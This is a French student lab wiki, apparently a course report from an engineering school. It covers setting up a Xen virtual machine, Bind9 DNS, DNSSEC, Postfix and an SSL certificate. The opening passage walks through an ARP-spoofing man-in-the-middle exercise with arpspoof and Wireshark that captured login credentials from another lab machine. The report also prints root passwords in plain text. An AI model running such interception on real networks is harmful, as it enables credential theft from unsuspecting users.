On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53951</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53951"/>
				<updated>2020-11-20T10:12:16Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Envoie du SSL Certification Gandi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers gandi a télechargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
